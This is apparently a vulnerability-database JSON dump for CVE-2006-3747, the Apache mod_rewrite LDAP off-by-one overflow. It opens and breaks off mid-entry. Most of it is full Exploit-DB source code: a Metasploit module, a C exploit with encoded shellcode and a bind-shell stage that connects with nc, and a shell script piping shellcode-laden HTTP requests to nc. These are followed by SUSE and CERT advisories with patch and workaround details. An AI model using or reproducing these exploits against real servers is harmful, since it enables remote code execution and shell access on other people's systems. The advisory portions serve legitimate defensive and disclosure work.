\\x6a\\x76\\x73\\x5a\\x72\\x30\\x73\\x61\\x53\\x65\\x4b\\\r\n\\x4f\\x6a\\x70\\x52\\x46\\x31\\x7a\\x52\\x44\\x73\\x56\\x50\\x68\\x51\\x73\\x50\\\r\n\\x6d\\x32\\x4a\\x62\\x70\\x51\\x49\\x47\\x59\\x6a\\x6c\\x6c\\x49\\x4b\\x57\\x42\\\r\n\\x4a\\x73\\x74\\x6d\\x59\\x6d\\x32\\x35\\x61\\x6f\\x30\\x48\\x73\\x4f\\x5a\\x6f\\\r\n\\x65\\x4c\\x49\\x39\\x6d\\x4b\\x4e\\x33\\x72\\x54\\x6d\\x6b\\x4e\\x33\\x72\\x34\\\r\n\\x6c\\x6c\\x4d\\x50\\x7a\\x57\\x48\\x4e\\x4b\\x4c\\x6b\\x6c\\x6b\\x71\\x78\\x32\\\r\n\\x52\\x6b\\x4e\\x6c\\x73\\x42\\x36\\x49\\x6f\\x73\\x45\\x65\\x78\\x6b\\x4f\\x6e\\\r\n\\x36\\x71\\x4b\\x42\\x77\\x43\\x62\\x53\\x61\\x76\\x31\\x70\\x51\\x30\\x6a\\x35\\\r\n\\x51\\x62\\x71\\x76\\x31\\x72\\x75\\x43\\x61\\x4b\\x4f\\x6e\\x30\\x73\\x58\\x4e\\\r\n\\x4d\\x7a\\x79\\x37\\x75\\x38\\x4e\\x31\\x43\\x4b\\x4f\\x4a\\x76\\x30\\x6a\\x39\\\r\n\\x6f\\x6b\\x4f\\x70\\x37\\x6b\\x4f\\x6e\\x30\\x45\\x38\\x39\\x77\\x54\\x39\\x79\\\r\n\\x56\\x71\\x69\\x79\\x6f\\x53\\x45\\x56\\x64\\x69\\x6f\\x69\\x46\\x6b\\x4f\\x62\\\r\n\\x57\\x6b\\x4c\\x4b\\x4f\\x6a\\x70\\x50\\x68\\x6a\\x50\\x6f\\x7a\\x37\\x74\\x43\\\r\n\\x6f\\x72\\x73\\x4b\\x4f\\x6a\\x76\\x79\\x6f\\x38\\x50\\x63\\\r\n\"'`\\\r\nHTTP/1.0\\r\\n\\\r\nHost: $host\\r\\n\\r\\n\" | nc -vv $host 80\r\n\r\n# milw0rm.com [2007-04-07]\r\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3680/"}, {"lastseen": "2016-02-02T06:26:15", "description": "Apache module mod_rewrite LDAP protocol Buffer Overflow. CVE-2006-3747. Remote exploit for windows platform", "published": "2010-02-15T00:00:00", "type": "exploitdb", "title": "Apache module mod_rewrite LDAP protocol Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2010-02-15T00:00:00", "id": "EDB-ID:16752", "href": "https://www.exploit-db.com/exploits/16752/", "sourceData": "##\r\n# $Id: apache_mod_rewrite_ldap.rb 8498 2010-02-15 00:48:03Z hdm $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Apache module mod_rewrite LDAP protocol Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits the mod_rewrite LDAP protocol scheme handling\r\n\t\t\t\tflaw discovered by Mark Dowd, which produces an off-by-one overflow.\r\n\t\t\t\tApache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.\r\n\t\t\t\tThis module requires REWRITEPATH to be set accurately. In addition,\r\n\t\t\t\tthe target must have 'RewriteEngine on' configured, with a specific\r\n\t\t\t\t'RewriteRule' condition enabled to allow for exploitation.\r\n\r\n\t\t\t\tThe flaw affects multiple platforms, however this module currently\r\n\t\t\t\tonly supports Windows based installations.\r\n\t\t\t},\r\n\t\t\t'Author' => 'patrick',\r\n\t\t\t'Version' => '$Revision: 8498 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2006-3747' ],\r\n\t\t\t\t\t[ 'OSVDB', '27588' ],\r\n\t\t\t\t\t[ 'BID', '19204' ],\r\n\t\t\t\t\t[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/3680' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/3996' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/2237' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => ['win'], # 'linux'],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 636,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\r\n\t\t\t\t\t'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t\t'DisableNops' => 'True',\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ], # patrickw tested OK 20090310 win32\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jul 28 2006',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('REWRITEPATH', [true, \"The mod_rewrite URI path\", \"rewrite_path\"]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef check\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => '/',\r\n\t\t\t'version' => '1.1',\r\n\t\t}, 2)\r\n\r\n\t\tif (res.to_s =~ /Apache/) # This could be smarter.\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# On Linux Apache, it is possible to overwrite EIP by\r\n\t\t# sending ldap://<buf> ... TODO patrickw\r\n\r\n\t\ttrigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'\r\n\r\n\t\tprint_status(\"Sending payload.\")\r\n\t\tsend_request_raw({\r\n\t\t\t\t'uri' => '/' + datastore['REWRITEPATH'] + trigger + payload.encoded,\r\n\t\t\t\t'version' => '1.0',\r\n\t\t\t\t}, 2)\r\n\t\thandler\r\n\tend\r\nend\r\n\r\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16752/"}, {"lastseen": "2016-01-31T19:51:13", "description": "Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3). CVE-2006-3747. Remote exploit for windows platform", "published": "2007-05-26T00:00:00", "type": "exploitdb", "title": "Apache 2.0.58 mod_rewrite Remote Overflow Exploit win2k3", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2007-05-26T00:00:00", "id": "EDB-ID:3996", "href": "https://www.exploit-db.com/exploits/3996/", "sourceData": "/*\r\napache mod rewrite exploit (win32)\r\n\r\nBy: fabio/b0x (oc-192, old CoTS member)\r\n\r\nVuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded\r\n\r\nCode: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)\r\n original exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also\r\n was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/\r\n\r\nUsage: ./apache hostname rewrite_path\r\n\r\nGreetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\r\n\r\nExample: ./apache 192.168.0.253 test\r\n[+]Preparing payload\r\n[+]Connecting...\r\n[+]Connected\r\n[+]Sending...\r\n[+]Sent\r\n[+]Starting second stage...\r\n[+]Connecting...\r\n[+]Connected\r\n[+]Sending...\r\n[+]Sent\r\n[+]Connecting to shell\r\nMicrosoft Windows [Version 5.2.3790]\r\n(C) Copyright 1985-2003 Microsoft Corp.\r\n\r\nC:\\Program Files\\Apache Group\\Apache2>exit\r\nexit\r\n[+]Owned\r\n*/\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n\r\n#define PORT 80 \r\n#define PORT2 4444\r\n#define MAXDATASIZE 1024\r\nchar get[] = \"/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90\";\r\nchar shellcode[]= \r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x48\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x41\"\r\n\"\\x58\\x50\\x30\\x42\\x30\\x41\\x6b\\x41\\x41\\x51\\x41\\x32\\x41\\x41\\x32\\x42\"\r\n\"\\x42\\x42\\x30\\x42\\x41\\x58\\x38\\x41\\x42\\x50\\x75\\x7a\\x49\\x4b\\x58\\x56\"\r\n\"\\x36\\x73\\x30\\x43\\x30\\x75\\x50\\x70\\x53\\x66\\x35\\x70\\x56\\x31\\x47\\x4c\"\r\n\"\\x4b\\x50\\x6c\\x44\\x64\\x55\\x48\\x6c\\x4b\\x73\\x75\\x75\\x6c\\x4c\\x4b\\x61\"\r\n\"\\x44\\x73\\x35\\x63\\x48\\x35\\x51\\x4b\\x5a\\x6c\\x4b\\x50\\x4a\\x37\\x68\\x6c\"\r\n\"\\x4b\\x42\\x7a\\x77\\x50\\x37\\x71\\x4a\\x4b\\x6b\\x53\\x44\\x72\\x30\\x49\\x6e\"\r\n\"\\x6b\\x44\\x74\\x6e\\x6b\\x56\\x61\\x68\\x6e\\x54\\x71\\x39\\x6f\\x6b\\x4c\\x70\"\r\n\"\\x31\\x4b\\x70\\x6c\\x6c\\x67\\x48\\x6b\\x50\\x54\\x34\\x53\\x37\\x6b\\x71\\x68\"\r\n\"\\x4f\\x44\\x4d\\x73\\x31\\x78\\x47\\x38\\x6b\\x38\\x72\\x45\\x6b\\x73\\x4c\\x31\"\r\n\"\\x34\\x46\\x74\\x52\\x55\\x6b\\x51\\x6c\\x4b\\x63\\x6a\\x65\\x74\\x56\\x61\\x7a\"\r\n\"\\x4b\\x32\\x46\\x4c\\x4b\\x76\\x6c\\x70\\x4b\\x4e\\x6b\\x30\\x5a\\x75\\x4c\\x67\"\r\n\"\\x71\\x5a\\x4b\\x6e\\x6b\\x74\\x44\\x4e\\x6b\\x57\\x71\\x6b\\x58\\x68\\x6b\\x76\"\r\n\"\\x62\\x50\\x31\\x4b\\x70\\x33\\x6f\\x53\\x6e\\x31\\x4d\\x63\\x6b\\x4b\\x72\\x65\"\r\n\"\\x58\\x55\\x50\\x61\\x4e\\x31\\x7a\\x36\\x50\\x42\\x79\\x70\\x64\\x4e\\x6b\\x74\"\r\n\"\\x59\\x6e\\x6b\\x43\\x6b\\x44\\x4c\\x4c\\x4b\\x51\\x4b\\x77\\x6c\\x4c\\x4b\\x35\"\r\n\"\\x4b\\x6e\\x6b\\x31\\x4b\\x74\\x48\\x73\\x63\\x63\\x58\\x6c\\x4e\\x70\\x4e\\x44\"\r\n\"\\x4e\\x78\\x6c\\x79\\x6f\\x4b\\x66\\x4d\\x59\\x6f\\x37\\x4b\\x31\\x78\\x6c\\x33\"\r\n\"\\x30\\x77\\x71\\x73\\x30\\x47\\x70\\x36\\x37\\x53\\x66\\x51\\x43\\x4d\\x59\\x69\"\r\n\"\\x75\\x39\\x78\\x56\\x47\\x57\\x70\\x37\\x70\\x37\\x70\\x6e\\x70\\x45\\x51\\x33\"\r\n\"\\x30\\x37\\x70\\x4c\\x76\\x72\\x39\\x55\\x48\\x7a\\x47\\x6d\\x74\\x45\\x49\\x54\"\r\n\"\\x30\\x4d\\x39\\x38\\x65\\x77\\x39\\x4b\\x36\\x50\\x49\\x6c\\x64\\x35\\x4a\\x52\"\r\n\"\\x50\\x4f\\x37\\x6c\\x64\\x4c\\x6d\\x76\\x4e\\x4d\\x39\\x4b\\x69\\x45\\x59\\x49\"\r\n\"\\x65\\x4e\\x4d\\x78\\x4b\\x4a\\x4d\\x6b\\x4c\\x77\\x4b\\x31\\x47\\x50\\x53\\x74\"\r\n\"\\x72\\x61\\x4f\\x46\\x53\\x67\\x42\\x57\\x70\\x61\\x4b\\x6c\\x4d\\x42\\x6b\\x75\"\r\n\"\\x70\\x70\\x51\\x6b\\x4f\\x7a\\x77\\x4b\\x39\\x4b\\x6f\\x4f\\x79\\x4f\\x33\\x4e\"\r\n\"\\x6d\\x71\\x65\\x52\\x34\\x53\\x5a\\x53\\x37\\x30\\x59\\x50\\x51\\x66\\x33\\x4b\"\r\n\"\\x4f\\x55\\x64\\x4c\\x4f\\x6b\\x4f\\x66\\x35\\x43\\x34\\x50\\x59\\x6e\\x69\\x47\"\r\n\"\\x74\\x6c\\x4e\\x6a\\x42\\x58\\x72\\x54\\x6b\\x64\\x67\\x72\\x74\\x39\\x6f\\x76\"\r\n\"\\x57\\x6b\\x4f\\x50\\x55\\x44\\x70\\x30\\x31\\x4b\\x70\\x50\\x50\\x30\\x50\\x50\"\r\n\"\\x50\\x32\\x70\\x77\\x30\\x46\\x30\\x53\\x70\\x70\\x50\\x49\\x6f\\x63\\x65\\x66\"\r\n\"\\x4c\\x4b\\x39\\x4f\\x37\\x30\\x31\\x6b\\x6b\\x33\\x63\\x71\\x43\\x42\\x48\\x54\"\r\n\"\\x42\\x63\\x30\\x76\\x71\\x63\\x6c\\x4c\\x49\\x6d\\x30\\x52\\x4a\\x32\\x30\\x32\"\r\n\"\\x70\\x36\\x37\\x59\\x6f\\x52\\x75\\x71\\x34\\x50\\x53\\x70\\x57\\x4b\\x4f\\x72\"\r\n\"\\x75\\x44\\x68\\x61\\x43\\x62\\x74\\x33\\x67\\x59\\x6f\\x63\\x65\\x67\\x50\\x4c\"\r\n\"\\x49\\x38\\x47\\x6d\\x51\\x5a\\x4c\\x53\\x30\\x36\\x70\\x53\\x30\\x33\\x30\\x4e\"\r\n\"\\x69\\x4b\\x53\\x53\\x5a\\x43\\x30\\x72\\x48\\x53\\x30\\x34\\x50\\x33\\x30\\x33\"\r\n\"\\x30\\x50\\x53\\x76\\x37\\x6b\\x4f\\x36\\x35\\x74\\x58\\x6e\\x61\\x4a\\x4c\\x67\"\r\n\"\\x70\\x35\\x54\\x33\\x30\\x63\\x30\\x49\\x6f\\x78\\x53\\x41\";\r\n\r\n\r\nchar finish[]= \"HTTP/1.0\\r\\nHost: \";\r\n\r\nchar payload2[]=\r\n\"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x18\"\r\n\"\\xd9\\x03\\x3a\\x83\\xeb\\xfc\\xe2\\xf4\\xe4\\xb3\\xe8\\x77\\xf0\\x20\\xfc\\xc5\"\r\n\"\\xe7\\xb9\\x88\\x56\\x3c\\xfd\\x88\\x7f\\x24\\x52\\x7f\\x3f\\x60\\xd8\\xec\\xb1\"\r\n\"\\x57\\xc1\\x88\\x65\\x38\\xd8\\xe8\\x73\\x93\\xed\\x88\\x3b\\xf6\\xe8\\xc3\\xa3\"\r\n\"\\xb4\\x5d\\xc3\\x4e\\x1f\\x18\\xc9\\x37\\x19\\x1b\\xe8\\xce\\x23\\x8d\\x27\\x12\"\r\n\"\\x6d\\x3c\\x88\\x65\\x3c\\xd8\\xe8\\x5c\\x93\\xd5\\x48\\xb1\\x47\\xc5\\x02\\xd1\"\r\n\"\\x1b\\xf5\\x88\\xb3\\x74\\xfd\\x1f\\x5b\\xdb\\xe8\\xd8\\x5e\\x93\\x9a\\x33\\xb1\"\r\n\"\\x58\\xd5\\x88\\x4a\\x04\\x74\\x88\\x7a\\x10\\x87\\x6b\\xb4\\x56\\xd7\\xef\\x6a\"\r\n\"\\xe7\\x0f\\x65\\x69\\x7e\\xb1\\x30\\x08\\x70\\xae\\x70\\x08\\x47\\x8d\\xfc\\xea\"\r\n\"\\x70\\x12\\xee\\xc6\\x23\\x89\\xfc\\xec\\x47\\x50\\xe6\\x5c\\x99\\x34\\x0b\\x38\"\r\n\"\\x4d\\xb3\\x01\\xc5\\xc8\\xb1\\xda\\x33\\xed\\x74\\x54\\xc5\\xce\\x8a\\x50\\x69\"\r\n\"\\x4b\\x8a\\x40\\x69\\x5b\\x8a\\xfc\\xea\\x7e\\xb1\\x12\\x67\\x7e\\x8a\\x8a\\xdb\"\r\n\"\\x8d\\xb1\\xa7\\x20\\x68\\x1e\\x54\\xc5\\xce\\xb3\\x13\\x6b\\x4d\\x26\\xd3\\x52\"\r\n\"\\xbc\\x74\\x2d\\xd3\\x4f\\x26\\xd5\\x69\\x4d\\x26\\xd3\\x52\\xfd\\x90\\x85\\x73\"\r\n\"\\x4f\\x26\\xd5\\x6a\\x4c\\x8d\\x56\\xc5\\xc8\\x4a\\x6b\\xdd\\x61\\x1f\\x7a\\x6d\"\r\n\"\\xe7\\x0f\\x56\\xc5\\xc8\\xbf\\x69\\x5e\\x7e\\xb1\\x60\\x57\\x91\\x3c\\x69\\x6a\"\r\n\"\\x41\\xf0\\xcf\\xb3\\xff\\xb3\\x47\\xb3\\xfa\\xe8\\xc3\\xc9\\xb2\\x27\\x41\\x17\"\r\n\"\\xe6\\x9b\\x2f\\xa9\\x95\\xa3\\x3b\\x91\\xb3\\x72\\x6b\\x48\\xe6\\x6a\\x15\\xc5\"\r\n\"\\x6d\\x9d\\xfc\\xec\\x43\\x8e\\x51\\x6b\\x49\\x88\\x69\\x3b\\x49\\x88\\x56\\x6b\"\r\n\"\\xe7\\x09\\x6b\\x97\\xc1\\xdc\\xcd\\x69\\xe7\\x0f\\x69\\xc5\\xe7\\xee\\xfc\\xea\"\r\n\"\\x93\\x8e\\xff\\xb9\\xdc\\xbd\\xfc\\xec\\x4a\\x26\\xd3\\x52\\xe8\\x53\\x07\\x65\"\r\n\"\\x4b\\x26\\xd5\\xc5\\xc8\\xd9\\x03\\x3a\";\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n int sockfd, numbytes; \r\n char buf[MAXDATASIZE];\r\n struct hostent *he;\r\n struct sockaddr_in their_addr;\r\n printf(\" Exploit: apache mod rewrite exploit (win32)\\n\"\r\n \" By: fabio/b0x (oc-192, old CoTS member)\\n\"\r\n \"Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\\n\"\r\n );\r\n if (argc != 3) {\r\n printf(\" Usage: ./apache hostname rewrite_path\\n\");\r\n exit(1);\r\n }\r\n printf(\"\\n[+]Preparing payload\\n\");\r\n\r\n char payload[748];\r\n sprintf(payload,\"GET /%s%s%s%s%s\\r\\n\\r\\n\\0\",argv[2],get,shellcode,finish,argv[1]);\r\n\r\n printf(\"[+]Connecting...\\n\");\r\n if ((he=gethostbyname(argv[1])) == NULL) {\r\n printf(\"[-]Cannot resolv hostname...\\n\");\r\n exit(1);\r\n }\r\n if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {\r\n printf(\"[-]Socket error...\\n\");\r\n exit(1);\r\n }\r\n\r\n their_addr.sin_family = AF_INET; \r\n their_addr.sin_port = htons(PORT); \r\n their_addr.sin_addr = *((struct in_addr *)he->h_addr);\r\n memset(their_addr.sin_zero, '\\0', sizeof their_addr.sin_zero);\r\n if (connect(sockfd, (struct sockaddr *)&their_addr,\r\n sizeof(struct sockaddr)) == -1) {\r\n printf(\"[-]Unable to connect\\n\");\r\n exit(1);\r\n }\r\n printf(\"[+]Connected\\n[+]Sending...\\n\");\r\n if (send(sockfd, payload, strlen(payload), 0) == -1){\r\n printf(\"[-]Unable to send\\n\");\r\n exit(1);\r\n }\r\n printf(\"[+]Sent\\n\");\r\n close(sockfd);\r\n printf(\"[+]Starting second stage...\\n\");\r\n sleep(3);\r\n printf(\"[+]Connecting...\\n\");\r\n if ((he=gethostbyname(argv[1])) == NULL) { \r\n printf(\"[-]Cannot resolv hostname...\\n\");\r\n exit(1);\r\n }\r\n if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {\r\n printf(\"[-]Socket error...\\n\");\r\n exit(1);\r\n }\r\n\r\n their_addr.sin_family = AF_INET; \r\n their_addr.sin_port = htons(PORT2);\r\n their_addr.sin_addr = *((struct in_addr *)he->h_addr);\r\n memset(their_addr.sin_zero, '\\0', sizeof their_addr.sin_zero);\r\n if (connect(sockfd, (struct sockaddr *)&their_addr,\r\n sizeof(struct sockaddr)) == -1) {\r\n printf(\"[-]Unable to connect\\n\");\r\n exit(1);\r\n }\r\n printf(\"[+]Connected\\n[+]Sending...\\n\");\r\n if (send(sockfd, payload2, strlen(payload2), 0) == -1){\r\n printf(\"[-]Unable to send\\n\");\r\n exit(1);\r\n }\r\n printf(\"[+]Sent\\n[+]Connecting to shell\\n\");\r\n close(sockfd);\r\n\r\n\r\n sleep(3);\r\n int exec;\r\n char what[1024];\r\n sprintf(what,\" nc -w 10 %s 4445\",argv[1]);\r\n exec=system(what);\r\n if (exec!=0){\r\n printf(\"[-]Not hacked\\n\");\r\n } else {\r\n printf(\"[+]Owned\\n\");\r\n }\r\n exit(1);\r\n} \r\n\r\n// milw0rm.com [2007-05-26]\r\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3996/"}, {"lastseen": "2016-01-31T15:49:08", "description": "Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC. CVE-2006-3747. Dos exploits for multiple platform", "published": "2006-08-21T00:00:00", "type": "exploitdb", "title": "Apache < 1.3.37 / 2.0.59 / 2.2.3 - mod_rewrite Remote Overflow PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2006-08-21T00:00:00", "id": "EDB-ID:2237", "href": "https://www.exploit-db.com/exploits/2237/", "sourceData": "#!/bin/sh\r\n# Exploit for Apache mod_rewrite off-by-one.\r\n# Vulnerability discovered by Mark Dowd.\r\n# CVE-2006-3747\r\n# \r\n# by jack <jack\\x40gulcas\\x2Eorg>\r\n# 2006-08-20\r\n#\r\n# Thx to xuso for help me with the shellcode.\r\n#\r\n# I suppose that you've the \"RewriteRule kung/(.*) $1\" rule if not\r\n# you must recalculate adressess.\r\n#\r\n# Shellcode is based on Taeho Oh bindshell on port 30464 and modified\r\n# for avoiding apache url-escape.. Take a look is quite nice ;)\r\n#\r\n# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at\r\n# 0x0834ae77 for any other version/system find it.\r\n#\r\n# Gulcas rulez :P\r\n\r\necho -e \"mod_rewrite apache off-by-one overflow\"\r\necho \"by jack <jack\\x40gulcas\\x2eorg>\\n\\n\"\r\n\r\nif [ $# -ne 1 ] ; then\r\n echo \"Usage: $0 webserver\"\r\n exit\r\nfi\r\n\r\nhost=$1\r\n\r\necho -ne \"GET /kung/ldap://localhost/`perl -e 'print \"%90\"x128'`%89%e6\\\r\n%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\\\r\n%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\\\r\n%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\\\r\n%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\\\r\n%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\\\r\n%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\\\r\n%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\\\r\n%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\\r\n%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\n\\\r\nHost: $host\\r\\n\\r\\n\" | nc $host 80\r\n\r\n# milw0rm.com [2006-08-21]\r\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2237/"}], "suse": [{"lastseen": "2016-09-04T11:56:37", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747", "CVE-2005-3352"], "description": "The following security problem was fixed in the Apache and Apache 2 web servers:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2006-07-28T14:21:14", "published": "2006-07-28T14:21:14", "id": "SUSE-SA:2006:043", "href": "http://lists.opensuse.org/opensuse-security-announce/2006-07/msg00019.html", "title": "remote denial of service in apache,apache2", "type": "suse", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:43:09", "bulletinFamily": "info", "cvelist": ["CVE-2005-3352", "CVE-2005-3357", "CVE-2006-3747"], "description": "### Overview \n\nA vulnerability in a common Apache HTTP server module, `mod_rewrite`, could allow a remote attacker to execute arbitrary code on an affected web server.\n\n### Description \n\nThe [Apache HTTP server](<http://httpd.apache.org/>) distribution includes a number of supplemental [modules](<http://httpd.apache.org/docs/mod/>) that provide additional functionality to the web server. One of these modules, [`mod_rewrite`](<http://httpd.apache.org/docs/mod/mod_rewrite.html>), provides a rule-based rewriting engine to rewrite requested URLs \"on the fly\" based on regular expressions.\n\nAn off-by-one error exists in the `ldap` scheme handling in `mod_rewrite`. For some `RewriteRules`, specifically those where the remote user can influence the beginning of a rewritten URL and that do not include any of the following flags: Forbidden (`F`), Gone (`G`), or NoEscape (`NE`), this could lead to a pointer being written out of bounds. This flaw causes a remotely exploitable vulnerability on web servers that have `mod_rewrite` enabled (configuration directive \"`RewriteEngine on`\") and configured to use certain rules. For example, rules with this format expose the vulnerability: \n \n`RewriteRule fred/(.*) $1` \n \nWhile rules with this format do not expose the vulnerability: \n \n`RewriteRule fred/(.*) joe/$1` \n \nThe versions of the `mod_rewrite` module supplied with the Apache HTTP server versions \n\n\n * 1.3 branch from 1.3.28\n * 2.0 branch from 2.0.46\n * 2.2 branch from 2.2.0\n \nare vulnerable to this issue but earlier versions are not. The Apache Software Foundation notes that `mod_rewrite` is not enabled and configured as a normal default, however it is a commonly used module and may be provided in a vulnerable configuration by redistributors. \n--- \n \n### Impact \n\nAn attacker may be able to execute arbitrary code in the context of the web server user (e.g., \"`apache`\", \"`httpd`\", \"`nobody`\", \"`SYSTEM`\", etc.). The Apache Software Foundation notes that, due to the nature of the underlying flaw, successful exploitation is dependent upon the stack frame layout of apache running on the target host. \n \n--- \n \n### Solution \n\n**Apply a patch from the vendor** \n \nPatches have been released to address this vulnerability. Please see the Systems Affected section of this document for more details. \n \n--- \n \n**Workarounds**\n\n \nDisable `mod_rewrite` if it is not required in your web server configuration. Instructions for doing this can be found in the [Apache HTTP server documentation](<http://httpd.apache.org/docs/>). Sites, particularly those that are not able to apply the patches, are encouraged to implement this workaround. \n \n--- \n \n### Vendor Information\n\n395412\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apache HTTP Server Project __ Affected\n\nUpdated: August 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe Apache project has released httpd versions 1.3.37 (for the 1.3 branch), 2.0.59 (for the 2.0 branch), and 2.2.3 (for the 2.2 branch) in response to this issue. Users are encouraged to upgrade to the appropriate version of the software that contains a fix. For more information, see the following Apache announcements:\n\n \n<<http://www.apache.org/dist/httpd/Announcement2.2.html>> \n<<http://www.apache.org/dist/httpd/Announcement2.0.html>> \n<<http://www.apache.org/dist/httpd/Announcement1.3.html>>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### Fedora Project __ Affected\n\nUpdated: July 27, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`Vendor statement: Fedora Project \n \nVulnerable \n \nThe ability to exploit this issue is dependent on the stack layout for \na particular compiled version of mod_rewrite. The Fedora project has \nanalyzed Fedora Core 4 and 5 binaries and determined that these \ndistributions are vulnerable to this issue. However this flaw does \nnot affect a default installation of Fedora Core; users who do not \nuse, or have not enabled, the Rewrite module are not affected by this \nissue. \n \nUpdates to correct 